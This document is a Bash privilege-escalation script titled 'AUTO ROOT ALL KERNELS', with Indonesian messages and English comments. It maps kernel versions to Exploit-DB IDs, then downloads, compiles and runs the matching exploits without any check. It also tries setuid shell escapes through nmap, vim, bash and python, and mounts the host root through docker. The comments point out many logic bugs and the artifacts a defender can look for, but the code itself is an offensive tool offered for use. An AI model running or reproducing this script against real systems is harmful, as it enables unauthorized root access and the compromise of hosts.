#!/bin/bash
# AUTO ROOT ALL KERNELS
# Automated privilege escalation for all kernel versions
# FOR EDUCATIONAL/AUTHORIZED SECURITY TESTING ONLY
#
# Overview (as written below): the script reads the running kernel version,
# looks it up in a static table of Exploit-DB IDs, downloads the matching C
# source over HTTPS, compiles it with gcc and executes the binary, checking
# `id -u` of this shell afterwards. Nothing that is downloaded is verified
# (no checksum or signature), so whatever the server returns is compiled and
# run as the invoking user.
#
# Host artifacts a defender can look for: a directory /tmp/auto_root_<epoch>
# containing auto_root.log and exploit_<id>.c / exploit_<id> files, gcc
# invoked on sources under /tmp, a full-filesystem `find / -perm -4000` scan,
# and outbound requests to https://www.exploit-db.com/download/<id>.
#
# Usage: bash <this-script>   (no options are parsed; "$@" is passed to main
# but never read)

# ANSI colour codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'   # assigned but not used anywhere in this file
PURPLE='\033[0;35m'
CYAN='\033[0;36m'
NC='\033[0m'

# Configuration
# WORK_DIR uses the epoch second as its only variable part, so the name is
# predictable by any other local user (not mktemp -d); LOG_FILE lives inside it.
WORK_DIR="/tmp/auto_root_$(date +%s)"
EXPLOIT_DB="https://www.exploit-db.com/download/"
LOG_FILE="$WORK_DIR/auto_root.log"

# Exploit table keyed by kernel pattern.
# Keys are shell glob patterns; detect_vulnerabilities matches them with an
# unquoted `[[ == ]]` against KERNEL_VERSION (e.g. "5.4.0"). Keys such as
# "dirtycow" or "cve-2021-4034" can never match a version string and are
# therefore never selected. Several distinct entries share the same EDB-ID
# 50808 even though the names refer to different vulnerabilities; the table
# as written does not distinguish them.
declare -A KERNEL_EXPLOITS=(
  # Linux Kernel < 5.8
  ["4.4.*"]="45010"
  ["4.15.*"]="47169"
  ["4.19.*"]="47169"
  ["5.4.*"]="47169"
  # Linux Kernel < 5.17
  ["5.10.*"]="50808"
  ["5.15.*"]="50808"
  # Linux Kernel < 6.2
  ["5.19.*"]="51435"
  ["6.0.*"]="51435"
  ["6.1.*"]="51435"
  # Generic exploits
  ["dirtycow"]="40839"
  ["dirtypipe"]="50808"
  ["polkit"]="50808"
  ["cve-2021-4034"]="50808"
  ["cve-2022-0847"]="50808"
)

#######################################
# Print the banner to stdout.
# Globals:   PURPLE, NC (read)
# Outputs:   the boxed banner between colour escape sequences
#######################################
show_banner() {
  echo -e "${PURPLE}"
  # Quoted delimiter: the box is emitted literally, no expansion
  cat << "EOF"
╔══════════════════════════════════════════════════════════╗
║ AUTO ROOT ALL KERNELS ║
║ Automated privilege escalation for all kernel versions ║
║ FOR AUTHORIZED TESTING ONLY ║
╚══════════════════════════════════════════════════════════╝
EOF
  echo -e "${NC}"
}

#######################################
# Exit early when this shell already has uid 0.
# Globals:   GREEN, NC (read)
# Returns:   does not return when uid is 0 (exit 0); otherwise 0
#######################################
check_privilege() {
  if [ "$(id -u)" -eq 0 ]; then
    echo -e "${GREEN}[+] Sudah running sebagai root!${NC}"
    exit 0
  fi
}

#######################################
# Create WORK_DIR, make it the current directory and start the log.
# Globals:   WORK_DIR, LOG_FILE, YELLOW, NC (read)
# Outputs:   status line to stdout; log header to LOG_FILE
# Note:      the `cd` result is not checked. Later functions use paths
#            relative to the current directory (./"$exploit_binary",
#            ./bash), so if the cd fails those run wherever the script
#            was started.
#######################################
setup_workdir() {
  echo -e "${YELLOW}[*] Membuat direktori kerja...${NC}"
  mkdir -p "$WORK_DIR"
  cd "$WORK_DIR"
  # Initialise the log
  echo "AUTO ROOT LOG - $(date)" > "$LOG_FILE"
  echo "Kernel: $(uname -r)" >> "$LOG_FILE"
  echo "================================" >> "$LOG_FILE"
}

#######################################
# Collect kernel, distro and architecture into globals and log them.
# Globals:   KERNEL_VERSION, KERNEL_MAJOR, KERNEL_MINOR, KERNEL_PATCH,
#            DISTRO, ARCH (written); LOG_FILE, CYAN, GREEN, NC (read)
# Outputs:   status lines to stdout; values appended to LOG_FILE
# Note:      KERNEL_VERSION is `uname -r` with everything from the first
#            '-' dropped (e.g. "5.4.0-42-generic" -> "5.4.0"). The
#            MAJOR/MINOR/PATCH components are set but not read anywhere
#            else in this file. DISTRO is the ID= line of /etc/os-release
#            with surrounding quotes stripped; empty if the file is absent.
#######################################
get_system_info() {
  echo -e "${CYAN}[*] Mendapatkan informasi sistem...${NC}"
  KERNEL_VERSION=$(uname -r | cut -d'-' -f1)
  KERNEL_MAJOR=$(echo $KERNEL_VERSION | cut -d'.' -f1)
  KERNEL_MINOR=$(echo $KERNEL_VERSION | cut -d'.' -f2)
  KERNEL_PATCH=$(echo $KERNEL_VERSION | cut -d'.' -f3)
  DISTRO=$(cat /etc/os-release 2>/dev/null | grep -i "^id=" | cut -d'=' -f2 | tr -d '"')
  ARCH=$(uname -m)
  echo -e "${GREEN}[+] Kernel Version: $KERNEL_VERSION${NC}"
  echo -e "${GREEN}[+] Distribution: $DISTRO${NC}"
  echo -e "${GREEN}[+] Architecture: $ARCH${NC}"
  # Save to log
  echo "Kernel: $KERNEL_VERSION" >> "$LOG_FILE"
  echo "Distro: $DISTRO" >> "$LOG_FILE"
  echo "Arch: $ARCH" >> "$LOG_FILE"
  echo "" >> "$LOG_FILE"
}

#######################################
# Build the list of candidate EDB-IDs for this host.
# Globals:   KERNEL_VERSION, KERNEL_EXPLOITS, LOG_FILE, colours (read)
# Outputs:   coloured status lines AND, as the last line, the de-duplicated
#            IDs separated by spaces — all on stdout. main() captures the
#            whole of stdout with $(...), so the status lines are part of
#            what the caller receives, not only the ID list.
# Returns:   0
#######################################
detect_vulnerabilities() {
  echo -e "${CYAN}[*] Mendeteksi kerentanan kernel...${NC}"
  local vulnerabilities=()
  # Match the kernel version against the table's glob keys
  for pattern in "${!KERNEL_EXPLOITS[@]}"; do
    if [[ "$KERNEL_VERSION" == $pattern ]]; then
      vulnerabilities+=("${KERNEL_EXPLOITS[$pattern]}")
      echo -e "${GREEN}[+] Potensi kerentanan: $pattern (EDB-ID: ${KERNEL_EXPLOITS[$pattern]})${NC}"
    fi
  done
  # Version-specific checks.
  # `<` inside [[ ]] is a lexicographic string comparison, not a version
  # comparison: "4.15.0" sorts before "4.8.0" because '1' < '8'.
  if [[ "$KERNEL_VERSION" < "4.8.0" ]]; then
    vulnerabilities+=("40839") # Dirty Cow
    echo -e "${GREEN}[+] Potensi kerentanan: Dirty Cow (CVE-2016-5195)${NC}"
  fi
  # Prefix match only; no patch-level check is performed
  if [[ "$KERNEL_VERSION" == "5.8"* ]] || [[ "$KERNEL_VERSION" == "5.10"* ]] || [[ "$KERNEL_VERSION" == "5.15"* ]]; then
    vulnerabilities+=("50808") # Dirty Pipe
    echo -e "${GREEN}[+] Potensi kerentanan: Dirty Pipe (CVE-2022-0847)${NC}"
  fi
  # Polkit check: this is only a file-existence test on /usr/bin/pkexec,
  # so every host that ships pkexec is flagged regardless of its version.
  if [ -f "/usr/bin/pkexec" ]; then
    vulnerabilities+=("50808") # Polkit exploit
    echo -e "${GREEN}[+] Potensi kerentanan: Polkit (CVE-2021-4034)${NC}"
  fi
  # Remove duplicates (sort -u over the space-joined list)
  IFS=" " read -ra unique_vulns <<< "$(echo "${vulnerabilities[@]}" | tr ' ' '\n' | sort -u | tr '\n' ' ')"
  echo -e "${YELLOW}[*] Ditemukan ${#unique_vulns[@]} potensi kerentanan${NC}"
  # Save to log
  echo "Vulnerabilities detected:" >> "$LOG_FILE"
  for vuln in "${unique_vulns[@]}"; do
    echo "- EDB-ID: $vuln" >> "$LOG_FILE"
  done
  echo "" >> "$LOG_FILE"
  echo "${unique_vulns[@]}"
}

#######################################
# Fetch an Exploit-DB entry into the current directory.
# Globals:   EXPLOIT_DB, colours (read)
# Arguments: $1 - EDB-ID appended to EXPLOIT_DB
#            $2 - name prefix for the output file
# Outputs:   status lines and, on success, the output file name — both on
#            stdout, so a caller using $(...) receives the status lines too
# Returns:   0 when the file exists afterwards, 1 otherwise
# Note:      no checksum, signature or content-type check: the `-f` test
#            passes for any file the download created, including an empty
#            file or an HTML error page saved under a .c name. wget is
#            preferred over curl when both are present.
#######################################
download_exploit() {
  local exploit_id=$1
  local exploit_name=$2
  echo -e "${CYAN}[*] Mendownload exploit: $exploit_name (EDB-ID: $exploit_id)${NC}"
  local exploit_url="${EXPLOIT_DB}${exploit_id}"
  local output_file="${exploit_name}_${exploit_id}.c"
  if command -v wget >/dev/null 2>&1; then
    wget -q -O "$output_file" "$exploit_url"
  elif command -v curl >/dev/null 2>&1; then
    curl -s -o "$output_file" "$exploit_url"
  else
    echo -e "${RED}[-] wget/curl tidak tersedia${NC}"
    return 1
  fi
  if [ -f "$output_file" ]; then
    echo -e "${GREEN}[+] Exploit berhasil didownload: $output_file${NC}"
    echo "$output_file"
  else
    echo -e "${RED}[-] Gagal mendownload exploit${NC}"
    return 1
  fi
}

#######################################
# Compile a downloaded .c file with gcc in the current directory.
# Globals:   colours (read)
# Arguments: $1 - path to the C source
# Outputs:   status lines and, on success, the binary name — all on stdout
# Returns:   0 when an executable named after the source exists, 1 otherwise
# Note:      `local output_name=$(...)` hides basename's exit status;
#            gcc's stderr is discarded, so compile errors are never shown.
#            The source is unreviewed remote content being compiled as-is.
#######################################
compile_exploit() {
  local exploit_file=$1
  local output_name=$(basename "$exploit_file" .c)
  echo -e "${CYAN}[*] Mengkompilasi exploit: $exploit_file${NC}"
  if command -v gcc >/dev/null 2>&1; then
    gcc -o "$output_name" "$exploit_file" 2>/dev/null
  else
    echo -e "${RED}[-] gcc tidak tersedia${NC}"
    return 1
  fi
  if [ -x "$output_name" ]; then
    echo -e "${GREEN}[+] Exploit berhasil dikompilasi: $output_name${NC}"
    echo "$output_name"
  else
    echo -e "${RED}[-] Gagal mengkompilasi exploit${NC}"
    return 1
  fi
}

#######################################
# Execute a compiled binary from the current directory after a 5 s delay.
# Globals:   LOG_FILE, colours (read)
# Arguments: $1 - binary name relative to the current directory
# Outputs:   warnings and the binary's combined stdout/stderr, also
#            appended to LOG_FILE via tee
# Returns:   0 if this shell's uid is 0 afterwards, 1 otherwise
# Note:      the pipeline's status is tee's, so the binary's own exit code
#            is not observed. The success test is `id -u` of this shell
#            process; it says nothing about any child process the binary
#            may have started.
#######################################
run_exploit() {
  local exploit_binary=$1
  echo -e "${RED}[!!!] MENJALANKAN EXPLOIT: $exploit_binary${NC}"
  echo -e "${RED}[!!!] INI DAPAT MERUSAK SISTEM!${NC}"
  echo -e "${YELLOW}[*] Tekan Ctrl+C untuk membatalkan dalam 5 detik...${NC}"
  sleep 5
  echo -e "${CYAN}[*] Menjalankan exploit...${NC}"
  # Record the run in the log
  echo "Running exploit: $exploit_binary" >> "$LOG_FILE"
  echo "================================" >> "$LOG_FILE"
  # Execute the binary
  ./"$exploit_binary" 2>&1 | tee -a "$LOG_FILE"
  # Check whether this shell is now uid 0
  if [ "$(id -u)" -eq 0 ]; then
    echo -e "${GREEN}[+] EXPLOIT BERHASIL! ANDA SEKARANG ROOT!${NC}"
    echo "EXPLOIT SUCCESSFUL!" >> "$LOG_FILE"
    return 0
  else
    echo -e "${RED}[-] Exploit gagal${NC}"
    echo "EXPLOIT FAILED" >> "$LOG_FILE"
    return 1
  fi
}

#######################################
# Enumerate setuid files and run a fixed command for known names.
# Globals:   colours (read)
# Outputs:   one line per setuid file found, plus status lines
# Returns:   0
# Note:      the `while` loop is the right-hand side of a pipe, so it runs
#            in a subshell: `suid_found=1` never reaches the outer shell
#            (the final "not found" message is therefore always printed)
#            and the `exit 0` inside the loop ends only the subshell, so
#            the rest of the script continues. Within the loop stdin is
#            the find output, so interactive commands started here read
#            the remaining file list as their input. The case arms match
#            on substrings of the path and then invoke a bare command
#            name (PATH lookup) or ./bash relative to WORK_DIR; $file is
#            only printed and matched, never executed.
#######################################
try_suid_exploits() {
  echo -e "${CYAN}[*] Mencari SUID binaries...${NC}"
  local suid_found=0
  find / -perm -4000 -type f 2>/dev/null | while read -r file; do
    echo -e "${YELLOW}[+] Ditemukan SUID: $file${NC}"
    suid_found=1
    # Try a known technique for this name
    case "$file" in
      *nmap*)
        echo -e "${CYAN}[*] Mencoba exploit nmap...${NC}"
        nmap --interactive 2>/dev/null
        ;;
      *vim*)
        echo -e "${CYAN}[*] Mencoba exploit vim...${NC}"
        vim -c ':shell' 2>/dev/null
        ;;
      *bash*)
        echo -e "${CYAN}[*] Mencoba exploit bash...${NC}"
        ./bash -p 2>/dev/null
        ;;
      *python*)
        echo -e "${CYAN}[*] Mencoba exploit python...${NC}"
        python -c 'import os; os.setuid(0); os.system("/bin/bash")' 2>/dev/null
        ;;
    esac
    # Check whether this (sub)shell is now uid 0
    if [ "$(id -u)" -eq 0 ]; then
      echo -e "${GREEN}[+] SUID exploit berhasil!${NC}"
      exit 0
    fi
  done
  if [ "$suid_found" -eq 0 ]; then
    echo -e "${YELLOW}[-] Tidak ditemukan SUID binaries yang dapat dieksploitasi${NC}"
  fi
}

#######################################
# Remaining checks: docker group membership, writable files, cron listing.
# Globals:   colours (read)
# Outputs:   status lines; first 10 writable regular files outside /proc
#            and /sys; `ls -la` of the cron directories
# Returns:   status of the last command (ls)
# Note:      `groups | grep -q docker` is a substring match, so any group
#            name containing "docker" satisfies it. The docker command uses
#            -it and so needs a terminal; its stderr is discarded. The
#            writable-file and cron listings are displayed only — nothing
#            further is done with them.
#######################################
try_other_exploits() {
  echo -e "${CYAN}[*] Mencoba metode exploit lainnya...${NC}"
  # Docker group check
  if groups | grep -q docker; then
    echo -e "${YELLOW}[+] User termasuk dalam grup docker${NC}"
    echo -e "${CYAN}[*] Mencoba exploit docker...${NC}"
    docker run -v /:/hostOS -it ubuntu chroot /hostOS bash 2>/dev/null
  fi
  # Writable files
  echo -e "${CYAN}[*] Mencari file yang dapat ditulis...${NC}"
  find / -writable -type f ! -path "/proc/*" ! -path "/sys/*" 2>/dev/null | head -10
  # Cron jobs
  echo -e "${CYAN}[*] Memeriksa cron jobs...${NC}"
  ls -la /etc/cron* /var/spool/cron/ 2>/dev/null
}

#######################################
# Entry point: banner, uid check, work dir, info, then the three phases.
# Globals:   vulnerabilities, exploit_file, exploit_binary (written, not
#            declared local); LOG_FILE, colours (read)
# Arguments: ignored
# Note:      `vulnerabilities=($(detect_vulnerabilities))` word-splits the
#            function's entire stdout, which includes its coloured status
#            lines, so the array holds every word of those lines as well as
#            the EDB-IDs, and the loop below treats each word as an ID.
#            Likewise exploit_file / exploit_binary capture the status
#            lines printed by download_exploit / compile_exploit together
#            with the name they print last. `$?` right after a plain
#            `var=$(fn)` assignment is fn's exit status, so the `continue`
#            checks do see the function result.
#######################################
main() {
  show_banner
  check_privilege
  setup_workdir
  get_system_info
  # Detect candidate IDs
  vulnerabilities=($(detect_vulnerabilities))
  # Setuid phase first
  try_suid_exploits
  # If not root yet, kernel exploit phase
  if [ "$(id -u)" -ne 0 ]; then
    echo -e "\n${PURPLE}========================================${NC}"
    echo -e "${PURPLE} MENCOBA KERNEL EXPLOITS ${NC}"
    echo -e "${PURPLE}========================================${NC}"
    for exploit_id in "${vulnerabilities[@]}"; do
      echo -e "\n${CYAN}[*] Memproses exploit EDB-ID: $exploit_id${NC}"
      # Download
      exploit_file=$(download_exploit "$exploit_id" "exploit")
      if [ $? -ne 0 ]; then
        continue
      fi
      # Compile
      exploit_binary=$(compile_exploit "$exploit_file")
      if [ $? -ne 0 ]; then
        continue
      fi
      # Run; a reported success ends the script
      if run_exploit "$exploit_binary"; then
        exit 0
      fi
    done
  fi
  # Still not root: other methods
  if [ "$(id -u)" -ne 0 ]; then
    echo -e "\n${PURPLE}========================================${NC}"
    echo -e "${PURPLE} MENCOBA METODE LAIN ${NC}"
    echo -e "${PURPLE}========================================${NC}"
    try_other_exploits
  fi
  # Final check
  if [ "$(id -u)" -eq 0 ]; then
    echo -e "\n${GREEN}[+] BERHASIL MENDAPATKAN AKSES ROOT!${NC}"
    echo -e "${GREEN}[+] Log disimpan di: $LOG_FILE${NC}"
  else
    echo -e "\n${RED}[-] GAGAL MENDAPATKAN AKSES ROOT${NC}"
    echo -e "${YELLOW}[!] Coba metode manual atau periksa log: $LOG_FILE${NC}"
  fi
}

# Run the program
main "$@"